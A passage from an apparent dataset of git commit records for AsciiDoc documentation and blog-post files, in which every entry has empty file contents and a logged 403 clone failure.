uidop\/camel,tlehoux\/camel,nikhilvibhav\/camel,lburgazzoli\/apache-camel,snurmine\/camel,ullgren\/camel,anton-k11\/camel,akhettar\/camel,lburgazzoli\/apache-camel,jkorab\/camel,FingolfinTEK\/camel","old_file":"components\/camel-consul\/src\/main\/docs\/consul.adoc","new_file":"components\/camel-consul\/src\/main\/docs\/consul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfcc18797bab3c885be85280b642f235fd7bc902","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d6420745c9b67470fff91e8f2fa0f5f939fef76","subject":"Renamed '_posts\/2017-10-27-Go-lang-memo.adoc' to '_posts\/2017-10-27-Cmd-tips.adoc'","message":"Renamed '_posts\/2017-10-27-Go-lang-memo.adoc' to '_posts\/2017-10-27-Cmd-tips.adoc'","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-10-27-Cmd-tips.adoc","new_file":"_posts\/2017-10-27-Cmd-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f2b13b588e4a3dd611aae525e59fa0b46fba263","subject":"fixes #246 Need nngcat man page","message":"fixes #246 Need nngcat man page\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/man\/nngcat.adoc","new_file":"docs\/man\/nngcat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5ae366cdadbd672594fed0c2a0e732bd2163f8a","subject":"Update 2017-02-17-j-Query.adoc","message":"Update 2017-02-17-j-Query.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-j-Query.adoc","new_file":"_posts\/2017-02-17-j-Query.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1147386540119ac3bbc5f633c0025d57dbd95721","subject":"y2b create post HUGE 100,000 Subscriber Giveaway!","message":"y2b create post HUGE 100,000 Subscriber Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-07-22-HUGE-100000-Subscriber-Giveaway.adoc","new_file":"_posts\/2012-07-22-HUGE-100000-Subscriber-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"443fb54c37d162f834c3f2c30f4738d19e937d0a","subject":"y2b create post This Gadget is ALWAYS Listening...","message":"y2b create post This Gadget is ALWAYS Listening...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-28-This-Gadget-is-ALWAYS-Listening.adoc","new_file":"_posts\/2016-07-28-This-Gadget-is-ALWAYS-Listening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33ceadc7e434107248762b1195e25548471a5252","subject":"Update 2016-11-03-Creating-a-nice-Puppet-Workflow.adoc","message":"Update 2016-11-03-Creating-a-nice-Puppet-Workflow.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-11-03-Creating-a-nice-Puppet-Workflow.adoc","new_file":"_posts\/2016-11-03-Creating-a-nice-Puppet-Workflow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e96158f9cba030195919debb8e97f6271a0964d","subject":"fix(Reference): fix typo","message":"fix(Reference): fix typo\n","repos":"lidasong2014\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,azu\/promises-book,xifeiwu\/promises-book,azu\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,cqricky\/promises-book,wenber\/promises-book,purepennons\/promises-book,azu\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,oToUC\/promises-book,mzbac\/promises-book,sunfurong\/promise,genie88\/promises-book,liubin\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,wenber\/promises-book,dieface\/promises-book,azu\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,tangjinzhou\/promises-book,genie88\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,cqricky\/promises-book,liubin\/promises-book,dieface\/promises-book,mzbac\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,sunfurong\/promise","old_file":"Appendix-Reference\/readme.adoc","new_file":"Appendix-Reference\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11cf75107400108c80cfd55efefe031374920845","subject":"Non callable","message":"Non callable\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d6e4f7555ca43fff411efa54cfb929d5c452ec3","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd842587d05fb315deef060cf7b560abaa57a797","subject":"Update 2016-04-12-Hive-Tracks-and-Ethics.adoc","message":"Update 2016-04-12-Hive-Tracks-and-Ethics.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Hive-Tracks-and-Ethics.adoc","new_file":"_posts\/2016-04-12-Hive-Tracks-and-Ethics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0476fb65983f2b72dd9ca292b63788a76350f218","subject":"Deleted _posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","message":"Deleted _posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a953386565e4d001225ef93c67587e1e112235ad","subject":"Update 2017-04-23-Easily-designing-the-DB-connection-from-Java.adoc","message":"Update 2017-04-23-Easily-designing-the-DB-connection-from-Java.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-04-23-Easily-designing-the-DB-connection-from-Java.adoc","new_file":"_posts\/2017-04-23-Easily-designing-the-DB-connection-from-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2cb9a166752ee19cf0df9543b5a97ed5f2c8642","subject":"y2b create post This Is Probably The Ultimate Battery...","message":"y2b create post This Is Probably The Ultimate Battery...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-25-This-Is-Probably-The-Ultimate-Battery.adoc","new_file":"_posts\/2017-03-25-This-Is-Probably-The-Ultimate-Battery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecfa4dbfcd1149c389870b00d07d40eb47af0c54","subject":"y2b create post CES 2015 - THE FINALE","message":"y2b create post CES 2015 - THE FINALE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-01-12-CES-2015--THE-FINALE.adoc","new_file":"_posts\/2015-01-12-CES-2015--THE-FINALE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f84151dc657c780ce602f79473fb93bcdf61045f","subject":"Update 2016-12-20-Utiliser-lAPI-Google-Sheets-via-un-proxy.adoc","message":"Update 2016-12-20-Utiliser-lAPI-Google-Sheets-via-un-proxy.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2016-12-20-Utiliser-lAPI-Google-Sheets-via-un-proxy.adoc","new_file":"_posts\/2016-12-20-Utiliser-lAPI-Google-Sheets-via-un-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba66a60ab6871091094ef634fc29318a3b87146a","subject":"Deleted 2016-5-13-Engineer-Career-Path.adoc","message":"Deleted 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21ebbff067d094b645402195af6f914cd42e4f14","subject":"add spec guide","message":"add spec guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/spec.adoc","new_file":"content\/guides\/spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f47967aed2b2870fb6196f7493cb677f4b05f2b3","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8239241a65827a95c79399378fa5e3979932e888","subject":"Update 2015-10-12-My-Blog.adoc","message":"Update 2015-10-12-My-Blog.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-My-Blog.adoc","new_file":"_posts\/2015-10-12-My-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a772c950dcd3367e1829323bfc75e31ebdd5671","subject":"y2b create post Nyko Raven Controller Unboxing \\u0026 Overview","message":"y2b create post Nyko Raven Controller Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-16-Nyko-Raven-Controller-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-16-Nyko-Raven-Controller-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5fdeb71bcc4632091be207572119a5e93f41fb9","subject":"Checkstyle","message":"Checkstyle\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"799792c1182dcc5e43d43dba788750aa7c67d968","subject":"doc for zabbix 30 deploy","message":"doc for zabbix 30 deploy\n","repos":"jupierce\/openshift-tools,andrewklau\/openshift-tools,drewandersonnz\/openshift-tools,openshift\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,blrm\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,twiest\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,joelsmith\/openshift-tools,themurph\/openshift-tools,tiwillia\/openshift-tools,blrm\/openshift-tools,joelsmith\/openshift-tools,ivanhorvath\/openshift-tools,drewandersonnz\/openshift-tools,rhdedgar\/openshift-tools,openshift\/openshift-tools,joelsmith\/openshift-tools,tiwillia\/openshift-tools,jupierce\/openshift-tools,ivanhorvath\/openshift-tools,joelddiaz\/openshift-tools,themurph\/openshift-tools,tiwillia\/openshift-tools,themurph\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,joelddiaz\/openshift-tools,drewandersonnz\/openshift-tools,twiest\/openshift-tools,tiwillia\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,blrm\/openshift-tools,twiest\/openshift-tools,openshift\/openshift-tools,blrm\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,ivanhorvath\/openshift-tools,openshift\/openshift-tools,ivanhorvath\/openshift-tools,twiest\/openshift-tools,themurph\/openshift-tools,twiest\/openshift-tools,jupierce\/openshift-tools,drewandersonnz\/openshift-tools,joelsmith\/openshift-tools,jupierce\/openshift-tools,andrewklau\/openshift-tools,andrewklau\/openshift-tools,rhdedgar\/openshift-tools,openshift\/openshift-tools,twiest\/openshift-tools,ivanhorvath\/openshift-tools,andrewklau\/openshift-tools,rhdedgar\/openshift-tools,themurph\/openshift-tools,drewandersonnz\/openshift-tools,drewandersonnz\/openshift-tools","old_file":"docs\/zabbix_3.0.asciidoc","new_file":"docs\/zabbix_3.0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift\/openshift-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06261398f6dea2a33ffbf83afa9f74fcaa76c9eb","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2a1091416a2974794b48fbf88a8edb34a1a9bde","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-26-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"467e6094d4aa5fda92917b797bb10702c535f352","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef18313d4f4e900ea3c83630320f80e2615a6fa9","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95323bc4ae96a8846efc9f929ac26e8a3cb830c4","subject":"Renamed '_posts\/2019-01-31-Blog-Servers.adoc' to '_posts\/2018-01-09-Blog-Servers.adoc'","message":"Renamed '_posts\/2019-01-31-Blog-Servers.adoc' to '_posts\/2018-01-09-Blog-Servers.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Blog-Servers.adoc","new_file":"_posts\/2018-01-09-Blog-Servers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a459a25c0d05416a91b4b7605215d350017d1929","subject":"Create ScalaTopTips.adoc","message":"Create ScalaTopTips.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"ScalaTopTips.adoc","new_file":"ScalaTopTips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"3829cc601b21fae74078871ece2b1725fbe09a8f","subject":"Update 2017-08-10-AICSS.adoc","message":"Update 2017-08-10-AICSS.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-08-10-AICSS.adoc","new_file":"_posts\/2017-08-10-AICSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67fad92bd8e2fd436bfc1e26a98576f500638745","subject":"Update 2016-08-17-Episode-68-Blab-is-Dead-Long-live-Blab.adoc","message":"Update 2016-08-17-Episode-68-Blab-is-Dead-Long-live-Blab.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-08-17-Episode-68-Blab-is-Dead-Long-live-Blab.adoc","new_file":"_posts\/2016-08-17-Episode-68-Blab-is-Dead-Long-live-Blab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15d843da73ba148e43feeaf7b2ae4ec634e78ff2","subject":"Update 2016-06-05-T-E-S-T.adoc","message":"Update 2016-06-05-T-E-S-T.adoc","repos":"isaacriquelme\/endata.do,isaacriquelme\/endata.do,isaacriquelme\/endata.do,isaacriquelme\/endata.do","old_file":"_posts\/2016-06-05-T-E-S-T.adoc","new_file":"_posts\/2016-06-05-T-E-S-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/isaacriquelme\/endata.do.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9137da62aa0a12ed333233f92e1a3dc099bba863","subject":"2016-07-08-Badluck.adoc","message":"2016-07-08-Badluck.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-08-Badluck.adoc","new_file":"_posts\/2016-07-08-Badluck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a50abb8fedbee896aac41be21098e69681ec923b","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f196d24547c7429e4f13ccd6baf96582b318d2a2","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fafab65e19ef30637a49f6f43954ac4db8e600bc","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a9b80554e662cd2a465a02847a2c298ef071b7c","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0aadbdc403317957e408b7e00d6efb6df79bf1e8","subject":"CAMEL-14555 - Create an AWS-S3 component based on SDK v2, regen docs","message":"CAMEL-14555 - Create an AWS-S3 component based on SDK v2, regen docs\n","repos":"nicolaferraro\/camel,cunningt\/camel,alvinkwekel\/camel,pax95\/camel,christophd\/camel,christophd\/camel,nicolaferraro\/camel,DariusX\/camel,adessaigne\/camel,alvinkwekel\/camel,apache\/camel,ullgren\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,adessaigne\/camel,pmoerenhout\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,gnodet\/camel,christophd\/camel,ullgren\/camel,zregvart\/camel,nicolaferraro\/camel,tadayosi\/camel,tdiesler\/camel,mcollovati\/camel,zregvart\/camel,tadayosi\/camel,zregvart\/camel,pax95\/camel,nikhilvibhav\/camel,apache\/camel,tdiesler\/camel,tdiesler\/camel,tdiesler\/camel,apache\/camel,nikhilvibhav\/camel,tadayosi\/camel,cunningt\/camel,mcollovati\/camel,pmoerenhout\/camel,ullgren\/camel,DariusX\/camel,apache\/camel,DariusX\/camel,tdiesler\/camel,apache\/camel,ullgren\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,nikhilvibhav\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,DariusX\/camel,alvinkwekel\/camel,gnodet\/camel,adessaigne\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,pmoerenhout\/camel,mcollovati\/camel,gnodet\/camel,apache\/camel,tadayosi\/camel,mcollovati\/camel,zregvart\/camel,nicolaferraro\/camel,adessaigne\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,alvinkwekel\/camel,gnodet\/camel","old_file":"components\/camel-aws2-s3\/src\/main\/docs\/aws2-s3-component.adoc","new_file":"components\/camel-aws2-s3\/src\/main\/docs\/aws2-s3-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"edbde181535582b606c377df2f72c1eec2c39388","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de751bf8cd520d07e153cc5811dffb4acdeeb16","subject":"Update 2017-08-05-mecab.adoc","message":"Update 